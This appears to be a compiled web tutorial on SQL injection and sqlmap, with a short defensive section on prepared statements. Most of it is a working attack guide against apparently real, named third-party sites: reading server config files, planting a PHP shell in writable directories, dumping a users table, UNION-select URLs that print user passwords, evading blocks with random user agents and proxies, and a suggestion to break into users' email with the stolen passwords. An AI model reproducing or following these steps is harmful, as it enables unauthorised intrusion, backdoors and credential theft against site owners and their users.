Uploading a shell using SQL injection. Uploading the shell with sqlmap

Well, to the subject:

Spoiler: Uploading the shell

We have a SQL Injection on the site that looks like this:



The first thing we want to do is check whether we have privileges to write files on the target; to do this, open a terminal and run the following command:

sqlmap -u http://www.sacoor.com/site_terms.php?lang=en --banner --current-db --current-user --is-dba

Press Enter and the analysis of our SQL injection begins; the report looks like this:

As you can see in the report, the Apache version, the MySQL version and the OS installed on the server are listed; all of this will be useful later, but most importantly you can see that we have rights to write files, which is shown by the line Current User is DBA: True.

The next step is to obtain the path where we can write our shell. We can get the path to the site on the server by downloading the httpd.conf file. Information about the location of httpd.conf can be found using Google; you can search by the OS version that is installed, or use the list of the most likely paths. In general, I will not delve into surfing search engines; once you have found the most likely location of the file, it's time to download it to your disk. To do this, enter the following command, which requests that the file be read from the server:

sqlmap -u http://www.sacoor.com/site_terms.php?lang=en --file-read=/etc/httpd/conf/httpd.conf

Note right away that it is not always possible to find this config file on the first try, so you can use the most likely paths where the file may be located:

LIST OF POSSIBLE PATHS TO THE CONFIG FILE:

../../../../../../../../../usr/local/apache/conf/httpd.conf ../../../../ ../../../../../usr/local/apache2/conf/httpd.conf ../../../../../../../../ usr/local/apache/httpd.conf ../../../../../../../../usr/local/apache2/httpd.conf ../../.. /../../../../../usr/local/httpd/conf/httpd.conf ../../../../../../../usr/ local/etc/apache/conf/httpd.conf ../../../../../../../usr/local/etc/apache2/conf/httpd.conf ../.. /../../../../../usr/local/etc/httpd/conf/httpd.conf ../../../../../../../ usr/apache2/conf/httpd.conf ../../../../../../../usr/apache/conf/httpd.conf ../../../.. /../../../usr/local/apps/apache2/conf/httpd.conf ../../../../../../../usr/local/apps/ apache/conf/httpd.conf ../../../../../../etc/apache/conf/httpd.conf ../../../../../. ./etc/apache2/conf/httpd.conf ../../../../../../etc/httpd/conf/httpd.conf ../../../../ ../../etc/http/conf/httpd.conf ../../../../../../etc/apache2/httpd.conf ../../../. ./../../etc/httpd/httpd.conf ../../../../../../etc/http/httpd.conf ../../../. ./../../etc/httpd.conf ../../../../../opt/apache/conf/httpd.conf ../../../../. ./opt/apache2/conf/httpd.conf ../../../../var/www/conf/httpd.conf ../conf/httpd.conf

We receive a report from sqlmap in the following form:


As you can see, sqlmap reported that the downloaded file has the same size as the file on the server, so we have the right to read it. If there were insufficient rights to read the file, an error would appear saying that the file saved on our machine has a different size than the one on the server, or that there is no file at the path we specified. sqlmap saved the file among its report files, and to read it we need to launch the window manager. To do this, open another terminal window and enter the command:

Next, in the manager that opens, follow the path where sqlmap saved the file, i.e.:
/root/.sqlmap/output/sacoor.com
Then move the cursor onto the file, press F3 on the keyboard and read the Apache config file:


From the config file we see that the site is located on the server at the following path:
/home/sbshop/site/

Now that we have some information, we can try to upload the shell; to do this, we enter the following command:

After entering the command, sqlmap will ask what type of loader we want to use; since in our case the site is written in PHP, we will upload a PHP loader, so select item 4 and press Enter. Next, sqlmap will ask where we want to upload the loader, and since we already know the path to the site on the server, select item 2, press Enter and specify the path to the site:
/home/sbshop/site/

After that, press Enter and we see the following report:


In this case, sqlmap tells us that we do not have write rights to this folder. No problem, this is quite easy to solve. We run uniscan to check files and folders for writability; here is the command:

uniscan -u http://www.sacoor.com/ -qwe

Now the scanner will check for writable directories:


The scanner found three directories where files can be written, so we try to upload our shell loader again, but this time to a different location. Run the command again:

sqlmap -u http://www.sacoor.com/site_terms.php?lang=en --os-cmd -v 1

and, after selecting item 4 (uploading the PHP script), specify the path:
/home/sbshop/site/admin

We see the following:

SQL injection is an attack that exploits dynamic SQL statements by commenting out parts of a statement or adding a condition that is always true. It targets flaws in the web application's architecture and uses SQL statements to execute malicious SQL code.

In this article, we will look at the techniques used in SQL injections and how to protect web applications from such attacks.

How SQL injection works

The types of attacks that can be carried out using SQL injection vary depending on the type of database engine affected. The attack targets dynamic SQL statements. A dynamic statement is one that is created at run time from parameters taken from a web form or a URI query string.

Consider a simple web application with a login form. The HTML form code is below:

  • The form accepts an email address and a password, which are sent to a PHP file named index.php;
  • The session is stored in a cookie; this feature is enabled by checking the remember_me box. The POST method is used to send the data, which means the values are not displayed in the URL.

Let's assume that the query used to check the user's credentials on the server side looks like this:

  • The query uses the $_POST array values directly without sanitizing them;
  • The password is hashed with the MD5 algorithm.

We will look at a SQL injection attack using SQL Fiddle. Open the URL http://sqlfiddle.com/ in your browser. The following window will appear on the screen.

Note: You will need to write SQL statements:

Step 1: Enter this code in the left panel:

CREATE TABLE `users` (`id` INT NOT NULL AUTO_INCREMENT, `email` VARCHAR(45) NULL, `password` VARCHAR(45) NULL, PRIMARY KEY (`id`));
insert into users (email,password) values ("[email protected]",md5("abc"));

Step 2: Click the "Build Schema" button.
Step 3: Enter the below code in the right pane:

select * from users;

Step 4: Click "Run SQL". You will see the following result:

Let's assume the user provides the email address [email protected] and 1234 as the password. The query to be executed on the database might look like this:

The login query above can be bypassed by commenting out the password part and adding a condition that will always be true. Let's assume that an attacker enters the following data in the email address field:

[email protected]' OR 1 = 1 LIMIT 1 -- ' ]

and xxx in the password field.

The generated dynamic statement will look like this:

  • [email protected]' ends with a single quote, which terminates the string;
  • OR 1 = 1 LIMIT 1 is a condition that will always be true and limits the results returned to just one record;
  • -- ' AND ... is an SQL comment that removes the password part.

Copy the above query and paste it into the SQL Fiddle "Run SQL" text box as shown below:

Hacker activity: SQL injections into web applications

We have a simple web application available at http://www.techpanda.org/ that has been deliberately made vulnerable to SQL injection attacks for demonstration purposes for beginners. The HTML form code given above is taken from the login page of this application.

It provides basic protection, such as sanitizing the email field. This means that the above input cannot be used to bypass the login.

To bypass this, the password field can be used instead. The diagram below shows the steps to follow:

Let's assume that the attacker provides the following data:

Step 1: Enter [email protected] as the email address;
Step 2: Enter xxx') OR 1 = 1 -- ] as the password;
Then click the "Submit" button.

You will be taken to the administration panel. The generated query will look like this:

The diagram below shows how the query was generated:

Here:

  • The query assumes that MD5 hashing is used;
  • A closing single quote and parenthesis are used;
  • A condition that will always be true is added to the statement.

Typically, attackers try to use several different methods in an SQL injection attack to achieve their goals.

Other types of SQL injection attacks

SQL injections can cause much more damage than logging into a system by bypassing the authentication mechanism. Such attacks can:

  • Delete data;
  • Update data;
  • Add data;
  • Execute commands on the server that download and install malicious programs;
  • Export valuable data, such as credit card details, email addresses and passwords, to a server controlled by the attacker.

The above list is not complete. It simply gives an idea of the dangers SQL injections pose.

Tools for automating SQL injections

In the above example, we used manual attack methods. Before performing a SQL injection test, you should know that there are automated tools that allow you to carry out attacks more efficiently and quickly:

  • SQLSmack;
  • SQLPing 2;
  • SQLMap.

How to prevent SQL injections

Here are a few simple rules that will help protect against SQL injection attacks:

  • User input should not be trusted. It always needs to be sanitized before it is used in dynamic SQL operations.
  • Stored procedures: they can encapsulate SQL queries and treat all input data as parameters.
  • Prepared statements: the query is created first, and all user-supplied data is then passed as parameters. This way the data cannot affect the syntax of the SQL statement.
  • Regular expressions: they can be used to detect potentially malicious input and remove it before executing SQL statements.
  • Database connection rights: to protect against SQL injection, the accounts used to connect to the database should be granted only the access rights they need. This limits what SQL statements can do on the server.
  • Error messages: they must not disclose confidential information. A simple custom error message such as "Sorry, a technical error occurred. The support team has already been notified. Please try again later" can be shown instead of displaying the SQL query that caused the error.
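The following is an added example, not code from the original post, that places the page's string-built login query beside the prepared-statement version it recommends and runs both against an in-memory SQLite copy of the `users` table; the sample account, the `md5()` helper registered in SQLite and the two bypass inputs are constructed here to mirror the page's inputs.

```python
import hashlib
import sqlite3

# Constructed sample account; not taken from the page.
SAMPLE_USER = ("user@example.com", "abc")

# The two bypass inputs described on the page: the first in the email field,
# the second in the password field (email, password).
EMAIL_PAYLOAD = ("nobody@example.com' OR 1 = 1 LIMIT 1 -- '", "xxx")
PASSWORD_PAYLOAD = ("user@example.com", "xxx') OR 1 = 1 -- ")


def md5_hex(text):
    """MD5 hex digest, mirroring MySQL's md5() used by the page's schema."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def make_db():
    """In-memory copy of the page's users table (id, email, password=md5)."""
    conn = sqlite3.connect(":memory:")
    # SQLite has no md5(); register one so the queries read like the original.
    conn.create_function("md5", 1, md5_hex)
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY AUTOINCREMENT, "
                 "email TEXT, password TEXT)")
    conn.execute("INSERT INTO users (email, password) VALUES (?, md5(?))",
                 SAMPLE_USER)
    return conn


def login_unsafe(conn, email, password):
    """Dynamic SQL built by string interpolation, as in the page's login query.
    Whatever the user typed becomes part of the SQL text."""
    sql = ("SELECT id, email FROM users WHERE email = '%s' "
           "AND password = md5('%s')" % (email, password))
    return conn.execute(sql).fetchone()


def login_safe(conn, email, password):
    """Prepared statement: the SQL text is fixed and user input is bound as
    parameters, so quotes, OR and -- in the input are just characters."""
    sql = "SELECT id, email FROM users WHERE email = ? AND password = md5(?)"
    return conn.execute(sql, (email, password)).fetchone()


def compare(conn):
    """For each input return (unsafe_accepted, safe_accepted); True means a
    user row came back, i.e. the login succeeded."""
    cases = {"valid": SAMPLE_USER,
             "email_field": EMAIL_PAYLOAD,
             "password_field": PASSWORD_PAYLOAD}
    return {name: (login_unsafe(conn, *creds) is not None,
                   login_safe(conn, *creds) is not None)
            for name, creds in cases.items()}


if __name__ == "__main__":
    for name, (unsafe_ok, safe_ok) in compare(make_db()).items():
        print("%-15s unsafe=%s safe=%s" % (name, unsafe_ok, safe_ok))
```

Only the valid credentials pass the prepared-statement version; both bypass inputs succeed against the interpolated query and fail against the parameterized one.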


What is sqlmap and what is it for?

The program allows you to check sites for SQL injection and XSS vulnerabilities, and also to exploit SQL injection. Various types of SQL injection and a wide range of databases are supported.

What can you do with sqlmap

With sqlmap you can:

  • check if websites have vulnerabilities

If the site is vulnerable to SQL injection, then it is possible:

  • retrieve information from the database, including a dump of the entire database
  • modify and delete information in the database
  • upload a shell (backdoor) to the web server

One of the scenarios for using sqlmap:

  • Getting usernames and passwords from the database
  • Searching for the site's administration panel (admin panel)
  • Logging in to the admin panel with the obtained login and password

If there is a vulnerability, the attack can develop in various directions:

  • Data modification
  • Uploading a backdoor
  • Injecting JavaScript code to obtain user data
  • Injecting code to hook browsers with BeEF

As we can see, SQL injection is a very dangerous vulnerability that gives an attacker great opportunities.

Checking websites using sqlmap

If the site receives data from the user via the GET method (when both the variable name and the transmitted value are visible in the browser's address bar), then you need to select the address of the page in which this variable is present. It comes after the question mark (?), for example:

  • http://www.dwib.org/faq2.php?id=8
  • http://www.wellerpools.com/news-read.php?id=22
  • http://newsandviews24.com/read.php?id=p_36

In the first address, the variable name is id and the value passed is 8. In the second address the variable name is also id, and the value passed is 22. In the third example, the variable name is the same, but the value passed is p_36. The variable having the same name on different sites is a coincidence; it can be anything, the transmitted data can be anything, and there can be several variables with values, separated by the & symbol.

If we want to check whether the id variable is vulnerable to SQL injection, we need to enter the entire address, http://www.dwib.org/faq2.php?id=8 (not http://www.dwib.org/faq2.php or http://www.dwib.org).

The command to check a variable passed by the GET method is very simple:

sqlmap -u site_address

For these sites the commands will be:

sqlmap -u http://www.dwib.org/faq2.php?id=8
sqlmap -u http://www.wellerpools.com/news-read.php?id=22
sqlmap -u http://newsandviews24.com/read.php?id=p_36

During the check, sqlmap may ask various questions, which you answer with y (Yes) or n (No). The letters y and n can be upper- or lowercase. The capital letter marks the default choice; if you agree with it, just press Enter.

Examples of situations and questions:

Heuristics detected that the target is protected by some kind of WAF/IPS/IDS do you want sqlmap to try to detect backend WAF/IPS/IDS?

Heuristics determined that the target is protected by some kind of WAF/IPS/IDS. Do you want sqlmap to try to determine the name of the WAF/IPS/IDS?

My favorite request:

heuristic (basic) test shows that GET parameter "id" might be injectable (possible DBMS: "MySQL")
testing for SQL injection on GET parameter "id"
it looks like the back-end DBMS is "MySQL". Do you want to skip test payloads specific for other DBMSes?

The point is that the heuristics have determined that the parameter may be vulnerable and the remote DBMS has already been identified, so we are asked whether we want to continue the check. In the second screenshot, the site is also vulnerable to XSS.

If you want to automate the process so that sqlmap does not ask you every time but uses the default choice (the defaults are generally the best options), run the command with the --batch option:

sqlmap -u http://www.dwib.org/faq2.php?id=8 --batch

Possible problems when scanning sqlmap

The following errors may appear:

connection timed out to the target URL. sqlmap is going to retry the request(s)
if the problem persists please check that the provided target URL is valid. In case that it is, you can try to rerun with the switch "--random-agent" turned on and/or proxy switches ("--ignore-proxy", "--proxy",...)

This means that the website refuses to "talk" to sqlmap. One option offered is --random-agent. If you can view the site in a browser but sqlmap reports that it cannot connect, the site is ignoring requests based on the User-Agent. The --random-agent option replaces sqlmap's standard value with a random one:

sqlmap -u http://www.wellerpools.com/news-read.php?id=22 --random-agent

Another reason for this error could be that your IP is blocked by the website; in that case you need to use a proxy. If you are already using a proxy and this error appears, it may mean that the proxy has connectivity problems, and you should try without it.

sqlmap scan results

Detected SQL injections are displayed as follows:

That is, they are highlighted in bold green, the name of the vulnerable parameter and the type of SQL injection are written, and the word injectable appears.

Getting a list of databases with sqlmap

To get a list of databases, use the option --dbs. Examples:

sqlmap -u http://www.dwib.org/faq2.php?id=8 --dbs
sqlmap -u http://www.wellerpools.com/news-read.php?id=22 --random-agent --dbs
sqlmap -u http://newsandviews24.com/read.php?id=p_36 --dbs

Retrieving information from databases

For example, two databases were found for the site wellerpools.com:

[*] information_schema
[*] main_wellerpools

I want to know the list of tables in the main_wellerpools database. To do this, use the --tables option. In addition, we need to specify the database we are interested in after the -D option:

sqlmap -u http://www.wellerpools.com/news-read.php?id=22 --random-agent -D main_wellerpools --tables

List of tables:

For some reason, I want to know the list of columns in the users table. To do this, use the --columns option. In addition, we need to specify the database we are interested in (-D main_wellerpools) and, after the -T key, the table whose columns we want to see:

sqlmap -u http://www.wellerpools.com/news-read.php?id=22 --random-agent -D main_wellerpools -T users --columns

To display the contents, use the --dump option. It can be given together with just the database, in which case the entire database is dumped, or you can limit the data to one table or even one column. With the following command I want to see the contents of the entire users table:

sqlmap -u http://www.wellerpools.com/news-read.php?id=22 --random-agent -D main_wellerpools -T users --dump

Take a look at the passwords: on a quick inspection, I thought they were hashes. The admins really tried to defend themselves, but it didn't help them.

By the way, since the parameter that accepts data sent by the GET method is vulnerable, you can form a request directly in the browser's address bar so that the users' logins and passwords are displayed on the site itself:

  • http://www.wellerpools.com/news-read.php?id=-22+union+select+1,group_concat(user_name,0x3a,user_pwd),3,4,5,6,7,8,9, 10+from+users--
  • http://www.wellerpools.com/news-read.php?id=-22+UNION+SELECT+1,group_concat(user_id,0x3e,user_name,0x3e,user_pwd),3,4,5,6,7, 8,9,10+from+users--

That is, we have the usernames, passwords and email addresses of the site's users (and most likely its administrators too). If you can find the site's administrative panel, you can gain control of the site or the web server. Considering users' love of reusing the same passwords, and knowing their mailboxes, you could try to break into their mail.

In general, SQL injection is a very dangerous vulnerability.
